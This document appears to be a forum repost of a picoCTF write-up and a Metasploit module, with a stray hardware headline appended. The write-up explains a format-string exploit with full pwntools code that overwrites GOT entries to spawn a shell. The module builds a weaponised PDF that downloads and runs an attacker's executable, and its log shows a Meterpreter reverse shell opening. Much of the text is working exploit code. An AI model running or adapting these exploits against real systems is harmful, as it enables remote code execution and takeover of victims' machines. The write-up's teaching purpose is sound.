
Code Auditing

Though the source code was provided (you can find a link to it at the bottom of the write-up), you could easily spot the bug just by reading the disassembly. Since some of you might not be experienced with Reverse Engineering, below are the important parts of the code:

[...]
void set_exit_message(char *message) {
    if (!message) {
        printf("No message chosen\n");
        exit(1);
    }
    printf("Exit message set!\n");
    printf(message);
    append_command('e', message);
    exit(0);
}

void set_prompt(char *prompt) {
    if (!prompt) {
        printf("No prompt chosen\n");
        exit(1);
    }
    if (strlen(prompt) > 10) {
        printf("Prompt too long\n");
        exit(1);
    }
    printf("Login prompt set to: %10s\n", prompt);
    append_command('p', prompt);
    exit(0);
}
[...]
void loop() {
    char buf[1024];
    while (true) {
        printf("Config action: ");
        char *result = fgets(buf, 1024, stdin);
        if (!result)
            exit(1);
        char *type = strtok(result, " ");
        if (type == NULL) {
            continue;
        }
        char *arg = strtok(NULL, "\n");
        switch (type[0]) {
        case 'l':
            set_login_message(arg);
            break;
        case 'e':
            set_exit_message(arg);
            break;
        case 'p':
            set_prompt(arg);
            break;
        default:
            printf("Command unrecognized.\n");
            /* Fallthrough */
        case 'h':
            print_help();
            break;
        }
    }
}
[...]

Here is the bug:

void set_exit_message(char *message) {
    [...]
printf("Exit message set!\n"); printf(message); append_command('e', message); exit(0); } Cute, we've got control over printf! For those who do not understand why this is a bug, let me give you a brief rundown. To be honest, there are a bunch of resources on how format string attacks work, but since I'm making the effort to explain the exploit, it'd feel incomplete not to explain the theory behind it. I hope you know the basics of the stack at least, otherwise the following will not make much sense. Printf & Stack Analysis +------------+ | | | ... | | 8th arg | +------------+ | 7th arg | +------------+ | ret addr | +------------+ | ... | | local vars | | ... | +------------+ Now you might be asking yourselves, "what's up with the 7th and 8th argument in the ascii art?". Well, we are dealing with a 64-bit ELF binary. Meaning, as far as the function calling convention is concerned, the ABI states the following(simplified): The first 6 integer or pointer arguments to a function are passed in registers. The first is placed in rdi, the second in rsi, the third in rdx, and then rcx, r8 and r9. Only the 7th argument and onwards are passed on the stack. Interesting. Let's enter the h4x0r mode and brainstorm a little bit. By typing man 3 printf we get the following intel: #include <stdio.h> int printf(const char *format, ...); So printf receives "2" arguments: The string format i.e "%d %x %s". A variable number of arguments. Ok that sounds cool and all, but how can we exploit this? The key in exploit development and in hacking overall, is being able to see through the abstraction. Let me explain myself further. Let's assume we have the following code: [...] 1. int32_t num = 6; 2. printf("%d", num); [...] Here's the pseudo-assembly for it: 1. mov [rbp - offset], 0x6 2. mov rsi, [rbp - offset] 3. mov rdi, "%d" 4. call printf Our format specifier includes "%d". 
What this whispers into printf's ear is "yo printf, you are about to get called with one format specifier, %d to be precise. According to the ABI, expect the argument to be in rsi, ok?" (rdi is taken by the format string itself.) Then, printf will read the content of rsi and print the number 6 to stdout. Do you see where this is going? No? Alright, one more example.

[...]
1. int32_t num = 6;
2. printf("%d %d %d %d");
[...]

1. mov [rbp - offset], 0x6
2. ???
3. call printf

In case you didn't notice, I changed the format string and the number of arguments being passed to printf. "What will this whisper into printf's ear?" you ask. Well, "yo printf, you are about to get called with 4 format specifiers, 4 %d's to be precise. According to the ABI, expect the arguments to be in rsi, rdx and so on, ok?"

Now what's going to happen in this case? Has anything practically changed? Of course not! Printf is dumb, all it knows is the format specifier. It "trusts" us, the user/program, about the content of rsi, rdx etc.

As I've stated before, we had control over printf. Control over its format specifier argument to be exact. That's really powerful! Why?

The above clip is a demo of the vulnerable CTF task. If you read the source code real quick (shouldn't take more than 5 mins to understand what it does), you'd realize that set_exit_message essentially receives as an argument whatever we place next to 'e' (e stands for exit). Afterwards, it calls printf with that argument.

So what gives? The format string we provided instructed printf to print its 8 byte integer "arguments" as pointers (%p expects a pointer). The values printed are values that printf finds at the locations it would normally expect arguments. Because printf actually gets one real argument, namely the pointer to buf (passed in %rdi), it will expect the next 5 arguments within the remaining registers and everything else on the stack. That's the case with our binary as well! We managed to leak memory! And the best part?
We actually read values "above" set_exit_message's stack frame! Take a good look at the printf output. Does 0x400aa6 ring a bell? Looks like a text segment address. That's the return address in set_exit_message's stack frame, aka the address of an instruction inside loop()!

Moreover, did you notice the 0x7025207025207025 value? Since the architecture is little-endian, converting the hex values to characters, we get the following:

0x25 -> '%'
0x70 -> 'p'
0x20 -> ' '

Holy moly! We leaked main's stack frame! But more importantly, our own input! That's the so-called read primitive, which basically means we get to read whatever value we want, either in registers, on the stack, or even in our own input. You'll see how crucial that is in the exploitation segment. Do you understand now what I mean by seeing through the abstraction? We managed to exploit a simple assumption that computer scientists took for granted.

Phew, alrighty, I hope I made sense folks. Let's slowly move on to the exploitation part. First of all, this is a pwnable task, which means we need to get a shell (root privs) in order to be able to read the flag text file. Hmm, how can we tackle the task knowing that we have a read primitive? Let's construct a plan:

We managed to read values off of registers and the stack, aka read primitive. We can take advantage of that and read certain values that will be useful to us, such as libc's base address. If we manage to leak libc's address, we can calculate addresses of other "pwnable" functions such as execve or system, and get a shell. Note, I say "leak", because ASLR is activated. Thus, in every execution the libc will have a different base address. Otherwise, if ASLR was off, its address would be hardcoded and our life would be much easier. Libc's functions are a constant offset away from libc's base address so we won't have an issue leaking them once we get the base address.

Alright, we can leak libc's functions, and then what? Let's pause our plan for a while.
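Both halves of the leak above, walking printf's phantom argument slots and decoding the leaked qword, can be sketched in a few lines. fake_printf below is a toy model of the slot-consuming behaviour, not real printf, and the register values are made up; only the 0x400aa6 and 0x7025207025207025 values come from the write-up:

```python
import struct

def fake_printf(fmt, reg_slots, stack_slots):
    # After the format string (in rdi), printf expects varargs in
    # rsi, rdx, rcx, r8, r9 and then on the stack. It never checks
    # whether the caller actually supplied them: each %p simply
    # consumes the next slot.
    slots = iter(list(reg_slots) + list(stack_slots))
    out = []
    for spec in fmt.split():
        if spec == "%p":
            out.append(hex(next(slots)))   # leaks whatever is in the slot
    return " ".join(out)

regs = [0x1, 0x2, 0x3, 0x4, 0x5]            # stale rsi..r9 contents (made up)
stack = [0x400aa6, 0x7025207025207025]      # return address, then our own buffer
print(fake_printf("%p %p %p %p %p %p %p", regs, stack))

# decoding the "we leaked our own input" qword: little-endian bytes
print(struct.pack("<Q", 0x7025207025207025))   # b'%p %p %p'
```

The struct.pack call is the inverse of what the target did when it loaded 8 bytes of our format string into a register, which is why the bytes come back out as the "%p %p %p" text we typed.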
(Note: Though dynamic linking is not a prerequisite to understand the high level view of the exploit, knowing its internals will give you a much better insight into the nitty-gritty details of the exploitation process. I have made quite a detailed write-up on Dynamic Linking internals which can be found here.)

The Dark Side Of Printf

We saw that we have an arbitrary read through the format string bug. But that's not enough. Wouldn't it be awesome if we could somehow not only read values but also write? Enter the dark zone folks:

%n specifier

If you are not into pwning or programming in C you have probably never seen the "%n" specifier. %n is the gold mine for format string attacks. Using this stackoverflow link as a reference, I'll explain what %n is capable of.

#include <stdio.h>

int main() {
    int val;
    printf("blah %n blah\n", &val);
    printf("val = %d\n", val);
    return 0;
}

Output:

blah blah
val = 5

Simply put, it stores the amount of characters printed on the screen to a variable (providing its address). Sweet, now we have a write primitive as well! How can we take advantage of that? Since we have an arbitrary write, we can write anything we want to wherever we want (you'll see how shortly). Let's resume our plan:

We can overwrite any address with a value that makes our life easier. We could overwrite a function's address with system's and game over! Nope, not that easily at least. Looking at the source, we can see that after printf is called, exit() is called. This is a bummer, since our plan does not only require an arbitrary write, but an arbitrary read as well. We can't just leak libc's base address AND overwrite a function through the same format string. We need to do it in separate steps. But how? Exit() will terminate the program. Unless, we overwrite exit's address with something else! Hmm, that's indeed a pretty neat idea. But with what? What about loop's address?! That sounds like an awesome plan!
We can overwrite exit's address with loop's, leading to the binary never exiting! That way, we can endlessly enter our bogus input and read/write values with no rush.

%[width] modifier

Another dark wizardry of printf is the following code:

[...]
printf("Output:");
printf("%100x", 6);
[...]

Terminal:

> ./demo
Output: 6

6 is padded to a size of 100 bytes. In other words, with the [width] part we can instruct printf to print whatever amount of bytes we want. Why is that useful though? Imagine having to write the value 0x1337 to a variable using the %n specifier (keep in mind that function addresses vary from 0x400000 all the way to 0x7fe5b94126a3; that trick will be really helpful to us). Trying to actually type 0x1337 characters by hand is tedious and a waste of time. The above modifier gets the job done easier.

%[number]$ specifier

The last trick we'll be using is the %[number]$ specifier, which helps us refer to certain stack offsets and what not. Demo time:

Scroll up to the demo where I showed you the bug in action through the %p specifier. If you count the values that are printed, you will notice that 0x400aa6 is the 9th value. By entering %9$p as I showed above, we can refer to it directly. Imagine replacing 'p' with 'n'. What would have happened? In a different case, it would crash because 0x400aa6 would be overwritten with the amount of characters being printed (which would not be a valid instruction address). In our case, nothing should happen since exit() is called, which means we will never return back to loop().

Pwning Time

I know this might look like a lot to take in, but without the basics and theory, we are handicapped. Bear in mind, it took me around 3-5 days of straight research in order to get this to work. If you feel like it's complicated, it's not. You just need to re-read it a couple of times and play with the binary yourself in order to get a feel for it. Be patient, code is coming soon. It will all make sense (hopefully).
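Putting the width modifier together with %n (or its 2-byte cousin %hn) is just arithmetic: the decimal width must make the running character count equal the value we want written. A sketch with the numbers this write-up ends up using, where loop() sits at 0x4009bd and the 6 characters already printed before the specifier were found empirically:

```python
LOOP = 0x4009bd

target = LOOP & 0xffff        # 0x09bd == 2493: the value %hn should store
chars_before = 6              # characters printf emits before reaching %hn
pad = target - chars_before   # width to request, i.e. a "%2487u" style pad

print(target, pad)            # 2493 2487
```

The 2487 produced here is exactly the pad value that shows up in the exploit script later; if your payload prints a different number of characters before the %hn, adjust chars_before accordingly.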
Our plan starts making sense. First step is to overwrite exit's address with loop's. Luckily for us, the binary does not have full ASLR on. Meaning, the text segment, which includes the machine code, and the Global Offset Table (refer to my Dynamic Linking write-up, I warned you), which includes function pointers to libc (and more), will have a hardcoded address.

Now that we learnt all about the dark side of printf, it's time to apply this knowledge to the task.

Overwriting exit

In order to do that, we first need to place exit's GOT entry in the format string. The reason for that is that since we have an arbitrary read/write:

We can place exit's address in the format string (which will be stored on the stack). Use the %[number]$ specifier to refer to its offset. Use the %[number] width modifier to pad whatever is already printed to a certain number. Use the %n specifier to write that certain number to exit's address.

Let's begin exploring with the terminal and soon we will move to python using pwntools. By the way, not sure if you noticed it, but I decided to include more "live" footage this time than just screenshots. The concept can be confusing so I'll do my best to be as thorough as possible. Let the pwning begin:

At this point I'd like to thank @exploit who reminded me of the stack alignment because I was stuck trying to figure out why the A's were getting mixed up. Watch each demo carefully. If I feel there is a need to explain myself further I'll add comments below the asciinema instance. You are more than welcome to ask me questions in the comments.

Anyway, as shown in the demo, we begin our testing by entering A's in our format string and then %p's in order to print them out. We found out that they are the 15th value. Let's try the %15$p trick this time.

Looking good so far. Let's automate it in python so we won't have to enter it every time.
# demo.py from pwn import * p = process(['./console', 'log']) pause() payload = "exit".ljust(8) payload += "A"*8 payload += "|%15$p|".rjust(8) p.sendline(payload) p.recvline() p.interactive() Awesome, now we've got control over our input and we know its exact position. Let's try with exit's GOT entry this time, 0x601258. Remember, we are dealing with 8-byte chunks so we need to pad the address to 8-bytes long: # demo.py from pwn import * p = process(['./console', 'log']) pause() payload = "exit".ljust(8) payload += p64(0x601258) # \x58\x12\x60\x00\x00\x00\x00\x00 payload += "|%15$p|".rjust(8) p.sendline(payload) p.recvline() p.interactive() Let's see what it does in action. 33 Hm, something is wrong here. Not only did we not get the address, but not even the "|...|" part. Why? Well, in case you didn't know, printf will stop at a null-byte. Which makes sense! Exit's GOT entry does have a null-byte. Meaning, printf will read up to '\x60' and then it will stop. How can we fix that? Easy, we just move our address after the format specifier. #demo.py from pwn import * EXIT_GOT = 0x601258 p = process(['./console', 'log']) pause() payload = "exit".ljust(8) payload += "|%16$p|".rjust(8) payload += p64(EXIT_GOT) p.sendline(payload) p.interactive() Now our script should work. I've changed exit's position in the string and updated '%15$p' to '%16$p'. I'll let you think about why I changed the specifier offset. After all this explanation it should be clear. Let's run our script, shall we? 32 Look at that, our address is there! Problem fixed. Unfortunately that's the bummer with 64-bit addresses but when it comes to 32-bit ones, we wouldn't have that issue. Either way, the fix was simple. Let's recap: We've managed to get control over our input. We placed exit's address in the string. In doing so, we managed to find its offset. Knowing its offset we can use %offset$n to write to that address. Thinking back to our plan, our goal is to overwrite exit's address with loop()'s. 
I know beforehand that exit's GOT entry points to 0x400736. That's because exit has not been called yet and thus it points to its PLT entry which has executable code to find exit's address in libc. So what we want is this: 0x400736 => 0x4009bd We don't have to overwrite the whole address as you can see. Only its 2 lower bytes. Now I will demonstrate how %n can be used. You will notice that demo will be kinda slow. That's because asciinema does not record 2 terminals at a time and I'll be using two. One to run the binary and one to use gdb and attach to it. Updated script: #demo.py from pwn import * EXIT_GOT = 0x601258 p = process(['./console', 'log']) pause() payload = "exit".ljust(8) payload += "|%17$n|".rjust(16) payload += p64(EXIT_GOT) p.sendline(payload) p.interactive() First I will show what's happening without the help of GDB and then I'll fire it up. 24 We get a segfault, which makes sense, right? We overwrote exit's address with the amount of characters being printed, which is too little and thus not a legal address to jump to. Let's see what GDB has to say about this. 33 As shown above, I attached to the running binary with GDB and pressed enter in my 2nd terminal to send the input. It's pretty clear that exit's address got overwritten. 0x400736 => 0x0000000d This is definitely not what we want as the result, but we are getting there! We can use our printf magic tricks and make it work. %[number] In order to increase the number of bytes being printed. %hn specifier I didn't mention it earlier, but it's time to introduce you to yet another dark side of printf. With %hn we can overwrite the address partially. %hn has the ability to overwrite only the 2 bytes of our variable, exit's address in our case. I said it earlier that we don't need to overwrite the whole address, only its lower 2 bytes since the higher 2 bytes are the same. I know, I know, confusing, but hey, that's why a demo is on its way! 
Updated script: #demo.py from pwn import * EXIT_GOT = 0x601258 p = process(['./console', 'log']) pause() payload = "exit".ljust(8) payload += "|%17$hn|".rjust(16) payload += p64(EXIT_GOT) p.sendline(payload) p.interactive() 12 Bam! We went from 0x0000000d to 0x0040000c. Partial overwrite folks! Now let's think carefully. We want 0x09bd to be the 2 lower bytes. All we have to do is: Convert 0x09bd to decimal. Use that number in the form of %2493x. You will notice that the 2 lower bytes will be slightly off but we can adjust that as you'll see soon. Let's update our script: #demo.py from pwn import * EXIT_GOT = 0x601258 LOOP = 0x4009bd p = process(['./console', 'log']) pause() payload = "exit".ljust(8) payload += ("%%%du|%%17$hn|" % 2493).rjust(16) payload += p64(EXIT_GOT) p.sendline(payload) p.interactive() 11 Looks like it worked! Well, almost. We just need to subtract 6 and we should be golden! Updated script: #demo.py from pwn import * EXIT_GOT = 0x601258 LOOP = 0x4009bd p = process(['./console', 'log']) pause() payload = "exit".ljust(8) payload += ("%%%du|%%17$hn|" % 2487).rjust(16) payload += p64(EXIT_GOT) p.sendline(payload) p.interactive() 7 Boom! We successfully overwrote exit's address with loop's. So every time exit gets called, we will jump right back in the beginning and we will be able to enter a different format string, but this time to leak libc's base address and more. Leaking Libc Time to move on with our plan. Leaking libc is not that hard. With a little bit of code we can resolve its base address in no time. def leak(addr): info("Leaking libc base address") payload = "exit".ljust(8) payload += "|%17$s|".rjust(8) payload += "blablala" payload += p64(addr) p.sendline(payload) p.recvline() data = p.recvuntil("blablala") fgets = data.split('|')[1] fgets = hex(u64(fgets.ljust(8, "\x00"))) return fgets I will not explain every technical aspect of the snippet since this is not a Python tutorial. 
This is what I tried to achieve overall:

The goal is to leak libc's base address. We can accomplish that by leaking a libc function's address. Fgets() in our case would be a wise choice since it's already been resolved. In particular, I entered fgets's GOT entry, which contains the actual address. The %s specifier will treat the address we entered as a string of bytes. Meaning, it will try to read what's IN the GOT entry. The output will be a stream of raw bytes. I used the u64() function to convert the raw bytes to an actual address. Once we find its address, we subtract its libc offset from it and we get the base address.

I made the exploit a little cleaner:

#demo.py
from pwn import *
import sys

HOST = 'shell2017.picoctf.com'
PORT = '47232'

LOOP = 0x4009bd
STRLEN_GOT = 0x601210
EXIT_GOT = 0x601258
FGETS_GOT = 0x601230
FGETS_OFFSET = 0x6dad0
SYSTEM_OFFSET = 0x45390
STRLEN_OFFSET = 0x8ab70

def info(msg):
    log.info(msg)

def leak(addr):
    info("Leaking libc base address")
    payload = "exit".ljust(8)
    payload += "|%17$s|".rjust(8)
    payload += "blablala"
    payload += p64(addr)
    p.sendline(payload)
    p.recvline()
    data = p.recvuntil("blablala")
    fgets = data.split('|')[1]
    fgets = hex(u64(fgets.ljust(8, "\x00")))
    return fgets

def overwrite(addr, pad):
    payload = "exit".ljust(8)
    payload += ("%%%du|%%17$hn|" % pad).rjust(16)
    payload += p64(addr)
    p.sendline(payload)
    p.recvline()
    return

def exploit(p):
    info("Overwriting exit with loop")
    pad = (LOOP & 0xffff) - 6
    overwrite(EXIT_GOT, pad)
    FGETS_LIBC = leak(FGETS_GOT)
    LIBC_BASE = hex(int(FGETS_LIBC, 16) - FGETS_OFFSET)
    SYSTEM_LIBC = hex(int(LIBC_BASE, 16) + SYSTEM_OFFSET)
    STRLEN_LIBC = hex(int(LIBC_BASE, 16) + STRLEN_OFFSET)
    info("system: %s" % SYSTEM_LIBC)
    info("strlen: %s" % STRLEN_LIBC)
    info("libc: %s" % LIBC_BASE)
    p.interactive()

if __name__ == "__main__":
    log.info("For remote: %s HOST PORT" % sys.argv[0])
    if len(sys.argv) > 1:
        p = remote(sys.argv[1], int(sys.argv[2]))
        exploit(p)
    else:
        p = process(['./console', 'log'])
        pause()
        exploit(p)
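The leak-to-base arithmetic in exploit() is worth seeing in isolation. %s prints the raw little-endian bytes stored in fgets's GOT slot (typically 6 significant bytes for a 64-bit userland address); padding them to 8 bytes and unpacking gives the address, and subtracting the symbol's offset inside the libc binary gives the randomized base. The leaked bytes below are made up for illustration; the 0x6dad0 offset is the one from the write-up:

```python
import struct

def u64(b: bytes) -> int:
    # pwntools-style u64: little-endian unpack, zero-padded to 8 bytes
    return struct.unpack("<Q", b.ljust(8, b"\x00"))[0]

FGETS_OFFSET = 0x6dad0                   # offset of fgets inside libc.so.6
leaked = b"\xd0\x3a\x7d\x15\xea\x7f"     # hypothetical raw bytes from the %s leak

fgets_addr = u64(leaked)                 # 0x7fea157d3ad0
libc_base = fgets_addr - FGETS_OFFSET    # page-aligned libc base
print(hex(fgets_addr), hex(libc_base))
```

Note the sanity check you get for free: a correct base address always ends in three hex zeroes, since libc is mapped at a page boundary.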
Just some notes on how to find the libc the binary uses and how to find the function offsets:

> ldd console
[...]
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6
[...]
> readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep fgets
[...]
753: 000000000006dad0 417 FUNC WEAK DEFAULT 13 fgets@@GLIBC_2.2.5
[...]

Let's watch the magic happen:

As you can see, in every execution the libc's base changes, aka ASLR. But that does not affect us anymore since we overwrote exit with loop().

Jumping to system

2/3 of our plan is successfully done. All that is left is redirecting code execution to system with the argument being /bin/sh or sh, of course. In case you didn't notice, I purposely picked strlen as the victim. Why is that? Both system and strlen are invoked with one argument. Thus, once we overwrite strlen with system, system will read what is supposedly strlen's argument and execute that command. Looks like we have to go back to step #1 of our exploit. Meaning, we have to overwrite strlen's libc address with system's. Luckily for us, they share the same base address so practically we only have to overwrite the lower 4 bytes. For example, let's use one of our script's outputs.

+-----------------------------+
|                             |
0x7fb4|21ec|0b70| (strlen) => 0x7fb4|21e7|b390| (system)
|                             |
+-----------------------------+

This is how we can accomplish that:

# subtract -7 at the end to get the correct offset
WRITELO = int(hex(int(SYSTEM_LIBC, 16) & 0xffff), 16) - 7
WRITEHI = int(hex((int(SYSTEM_LIBC, 16) & 0xffff0000) >> 16), 16) - 7

# call prompt in order to resolve strlen's libc address.
p.sendline("prompt asdf")
p.recvline()

info("Overwriting strlen with system")
overwrite(STRLEN_GOT, WRITELO)
overwrite(STRLEN_GOT+2, WRITEHI)

The only part that deserves a bit of explanation is this one:

overwrite(STRLEN_GOT, WRITELO)
overwrite(STRLEN_GOT+2, WRITEHI)

It seems like we overwrite the libc address via two short writes.
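Stripped of the int(hex(...)) round-trips, the two short writes are plain masking and shifting on the 16-bit halves of system's address. A sketch using one of the write-up's own sample addresses; the empirical -7 adjustment from the snippet above is left out here to keep the split itself visible:

```python
SYSTEM_LIBC = 0x7fe7a273a390

write_lo = SYSTEM_LIBC & 0xffff           # 0xa390 -> GOT bytes 0-1 via %hn
write_hi = (SYSTEM_LIBC >> 16) & 0xffff   # 0xa273 -> GOT bytes 2-3 via %hn

print(hex(write_lo), hex(write_hi))       # 0xa390 0xa273
```

Since system and strlen share the same randomized upper bytes, writing just these two halves into the GOT entry (at offsets +0 and +2) is enough to retarget strlen to system.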
It could be possible to do it with one write, but that would print a pretty big amount of padding bytes on the screen, so two writes is a bit cleaner. The concept is still the same. Let's visualize it as well:

strlen GOT = 0x601210

Global Offset Table
+--------------------+
|        ...         |
+--------------------+
|        ...         |
+--------------------+
|        0x21        | 0x601213 \
+--------------------+            strlen + 0x2
|        0xec        | 0x601212 /
+--------------------+
|        0x0b        | 0x601211 \
+--------------------+            strlen + 0x0
|        0x70        | 0x601210 /
+--------------------+

Now it should be more clear why and how we overwrite 2 bytes with each write. I'll show you each write separately with GDB and then the full exploit. Because I'll try to provide a view of both the exploit and GDB, the demos might be a bit slow because I'll be jumping around the terminals. Stay with me.

overwrite(STRLEN_GOT, WRITELO)

Exploit (skip a few seconds):

GDB:

You might have noticed that at some point in the exploit I typed "prompt asdf". The reason I did that was to resolve strlen's address since it's the first time it is being called. I set a breakpoint in GDB at that point and stepped through the process. The first time it went through the PLT stub code in order to resolve itself, and once I typed c, its address was resolved and we overwrote its 2 lower bytes.

Before:
system: 0x7fea06160390
strlen: 0x7fea061a5b70

After:
strlen: 0x7fea06160397

The 2 lower bytes are 7 bytes off, which is why in the exploit you saw the -7 subtraction. Sometimes it ended up being 5 or 6 bytes off, but it doesn't matter. Just adjust the value to your needs. On your system it should be the same offset more or less. Let's execute the exploit with both writes this time.

Exploit (skip a few seconds):

GDB:

Before:
system: 0x7fe7a273a390
strlen: 0x7fe7a277fb70

After:
strlen: 0x7fe7a273a390

Voila! We successfully overwrote strlen with system! Let's fire up the exploit without GDB and get shivers.

PoC Demo

Conclusion

That's been it folks.
I hope I didn't waste your time. If you feel puzzled, don't get discouraged, just re-read it a couple of times and research the same topic on google. After reading plenty of examples and implementing one of your own, you'll be 1337. By the way, the task was a remote one, but the server was kinda slow when the CTF ended so I implemented it locally. The only change that you'd have to make is to adjust the libc offsets, which is quite trivial since the libc was provided.

Thank you for taking the time to read my write-up. Feedback is always welcome and much appreciated. If you have any questions, I'd love to help you out if I can. Finally, if you spot any errors in terms of code/syntax/grammar, please let me know. I'll be looking out for mistakes as well. You can find my exploit and the binary (source code, libc included) here.

Peace out, @_py

Source: https://0x00sec.org/t/picoctf-write-up-bypassing-aslr-via-format-string-bug/1920
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::FileDropper
  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution',
      'Description'    => %q{
        This module exploits an unsafe Javascript API implemented in Nitro and
        Nitro Pro PDF Reader version 11. The saveAs() Javascript API function
        allows for writing arbitrary files to the file system. Additionally,
        the launchURL() function allows an attacker to execute local files on
        the file system and bypass the security dialog.

        Note: This is 100% reliable.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'mr_me <steven[at]srcincite.io>', # vulnerability discovery and exploit
          'sinn3r'                          # help with msf foo!
        ],
      'References'     =>
        [
          [ 'CVE', '2017-7442' ],
          [ 'URL', 'https://www.gonitro.com/' ],
        ],
      'DefaultOptions' =>
        {
          'DisablePayloadHandler' => false
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # truly universal
          [ 'Automatic', { } ],
        ],
      'DisclosureDate' => 'XXXX',
      'DefaultTarget'  => 0))

    register_options([
      OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
      OptString.new('URIPATH',  [ true, "The URI to use.", "/" ]),
    ], self.class)
  end

  def build_vbs(url, stager_name)
    name_xmlhttp = rand_text_alpha(2)
    name_adodb   = rand_text_alpha(2)

    vbs = %Q|<script language="VBScript">
Set #{name_xmlhttp} = CreateObject("Microsoft.XMLHTTP")
#{name_xmlhttp}.open "GET","http://#{url}",False
#{name_xmlhttp}.send
Set #{name_adodb} = CreateObject("ADODB.Stream")
#{name_adodb}.Open
#{name_adodb}.Type=1
#{name_adodb}.Write #{name_xmlhttp}.responseBody
#{name_adodb}.SaveToFile "C:#{@temp_folder}/#{@payload_name}.exe",2
set shellobj = CreateObject("wscript.shell")
shellobj.Run "C:#{@temp_folder}/#{@payload_name}.exe",0
</script>|

    vbs.gsub!(/ /,'')
    return vbs
  end

  def on_request_uri(cli, request)
    if request.uri =~ /\.exe/
      print_status("Sending second stage payload")
      return if ((p=regenerate_payload(cli)) == nil)
      data = generate_payload_exe( {:code=>p.encoded} )
      send_response(cli, data, {'Content-Type' => 'application/octet-stream'} )
      return
    end
  end

  def exploit
    # In order to save binary data to the file system the payload is written
    # to a .vbs file and executed from there.
    @payload_name = rand_text_alpha(4)
    @temp_folder  = "/Windows/Temp"

    register_file_for_cleanup("C:#{@temp_folder}/#{@payload_name}.hta")

    if datastore['SRVHOST'] == '0.0.0.0'
      lhost = Rex::Socket.source_address('50.50.50.50')
    else
      lhost = datastore['SRVHOST']
    end

    payload_src = lhost
    payload_src << ":#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe"

    stager_name = rand_text_alpha(6) + ".vbs"

    pdf = %Q|%PDF-1.7
4 0 obj
<< /Length 0 >>
stream
|
    pdf << build_vbs(payload_src, stager_name)
    pdf << %Q|
endstream
endobj
5 0 obj
<<
/Type /Page
/Parent 2 0 R
/Contents 4 0 R
>>
endobj
1 0 obj
<<
/Type /Catalog
/Pages 2 0 R
/OpenAction [ 5 0 R /Fit ]
/Names <<
/JavaScript <<
/Names [
(EmbeddedJS)
<<
/S /JavaScript
/JS (
this.saveAs('../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
app.launchURL('c$:/../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
)
>>
]
>>
>>
>>
endobj
2 0 obj
<</Type/Pages/Count 1/Kids [ 5 0 R ]>>
endobj
3 0 obj
<<>>
endobj
xref
0 6
0000000000 65535 f
0000000166 00000 n
0000000244 00000 n
0000000305 00000 n
0000000009 00000 n
0000000058 00000 n
trailer
<< /Size 6 /Root 1 0 R >>
startxref
327
%%EOF|

    pdf.gsub!(/ /,'')
    file_create(pdf)
    super
  end
end

=begin
saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/nitro.rc
[*] Processing scripts/nitro.rc for ERB directives.
resource (scripts/nitro.rc)> use exploit/windows/fileformat/nitro_reader_jsapi
resource (scripts/nitro.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (scripts/nitro.rc)> set LHOST 172.16.175.1
LHOST => 172.16.175.1
resource (scripts/nitro.rc)> exploit
[*] Exploit running as background job.
[*] Started reverse TCP handler on 172.16.175.1:4444
msf exploit(nitro_reader_jsapi) >
[+] msf.pdf stored at /Users/mr_me/.msf4/local/msf.pdf
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.100.4:8080/
[*] Server started.
[*] 192.168.100.4     nitro_reader_jsapi - Sending second stage payload
[*] Sending stage (957487 bytes) to 172.16.175.232
[*] Meterpreter session 1 opened (172.16.175.1:4444 -> 172.16.175.232:49180) at 2017-04-05 14:01:33 -0500
[+] Deleted C:/Windows/Temp/UOIr.hta
msf exploit(nitro_reader_jsapi) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 2412 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\researcher\Desktop>
=end

Sursa: https://gist.github.com/stevenseeley/725c6c0be2ff76494c23db730fd30b6d
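As a side note, the file-format half of the module can be reproduced outside Metasploit. Below is a rough Python sketch that assembles a PDF with the same kind of EmbeddedJS name-tree entry calling saveAs()/launchURL(); the object layout is simplified, the path is a placeholder, and the xref table is omitted, so treat it as an illustration of the structure rather than a working exploit:

```python
def build_poc_pdf(hta_path):
    """Assemble a minimal PDF whose document-level JavaScript drops and
    launches a file, mirroring the structure the module above emits.
    Illustrative only: no xref table, no stream object, placeholder path."""
    js = ("this.saveAs('{p}');"
          "app.launchURL('{p}');").format(p=hta_path)
    objects = [
        "1 0 obj << /Type /Catalog /Pages 2 0 R "
        "/Names << /JavaScript << /Names [ (EmbeddedJS) "
        "<< /S /JavaScript /JS (" + js + ") >> ] >> >> >> endobj",
        "2 0 obj << /Type /Pages /Count 1 /Kids [ 3 0 R ] >> endobj",
        "3 0 obj << /Type /Page /Parent 2 0 R >> endobj",
    ]
    body = "\n".join(objects)
    return "%PDF-1.7\n" + body + "\ntrailer << /Size 4 /Root 1 0 R >>\n%%EOF"

pdf = build_poc_pdf("../../../Windows/Temp/x.hta")
```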
-
An Intel Coffee Lake processor with 6 cores has been spotted
by unacomn on 24/07/2017

